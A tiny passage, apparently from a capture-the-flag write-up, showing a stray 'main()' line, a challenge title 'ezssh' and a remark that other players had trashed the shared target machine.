    main()

ezssh*

This one was a bit absurd: the shared target machine seems to have been trashed by other players...